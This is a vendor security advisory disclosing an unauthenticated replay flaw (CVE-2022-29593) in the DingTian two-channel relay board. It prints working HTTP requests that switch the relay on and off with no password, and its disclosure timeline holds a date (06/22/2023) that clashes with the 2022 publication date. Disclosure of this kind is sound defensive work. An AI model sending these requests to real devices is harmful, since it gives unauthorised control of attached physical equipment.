Trustwave SpiderLabs Security Advisory TWSL2022-001: Authentication Bypass by Capture-replay in DingTian 2 Channel Relay Board/Relay Card Published: 07/12/2022 Version: 1.0 Vendor: Shenzhen Dingtian Technologies Co.,Ltd Product: DingTian 2 Channel Relay Board/Relay Card (https://www.dingtian-tech.com/en_us/relay4.html) Version affected: Firmware V3.1.276A Product description: Dingtian is a manufacturer of IOT and access control system smart devices. Finding 1. Authentication Bypass by Capture-replay *****Credit: Victor Hanna of Trustwave CVE: CVE-2022-29593 CWE-294: Authentication Bypass by Capture-replay CWE-306: Missing Authentication for Critical Function Dingtian (Dingtian DT-R002) 2CH relay, running firmware V3.1.276A allows for an attacker to replay the same data or similar data. This allows the attacker to control the devices attached to the relays without requiring authentication. It was noticed that communications to and from the default SSID was sent in clear text using HTTP as its transport. Additonally, it was discovered that it was possible to send through replay HTTP post requests without the need for authentication NOR a valid signed/authorized request. Evidence shows the HTTP request and response used to turn on and off the relay. (Switch Relay On) Request GET /relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0& HTTP/1.1 Host: 192.168.7.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.7.1/relay_cgi.html Cookie: session=4463009 Response HTTP/1.1 200 OK Content-Type: text/html Content-Length: 11 &0&0&0&1&0& (Switch Relay Off) Request GET /relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0& HTTP/1.1 Host: 192.168.7.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.7.1/relay_cgi.html Cookie: session=4463009 Response HTTP/1.1 200 OK Content-Type: text/html Content-Length: 11 &0&0&0&0&0& Remediation Steps: No official fix is available. To limit exposure, restrict local access to trusted users only. Additionally, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Revision History: 03/14/2022 - Initial email to vendor 03/28/2022 - 2nd attempt to contact vendor 04/20/2022 - 3rd attempt to contact vendor 06/22/2023 - 4th attempt to contact vendor successful. Will not fix 07/12/2022 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.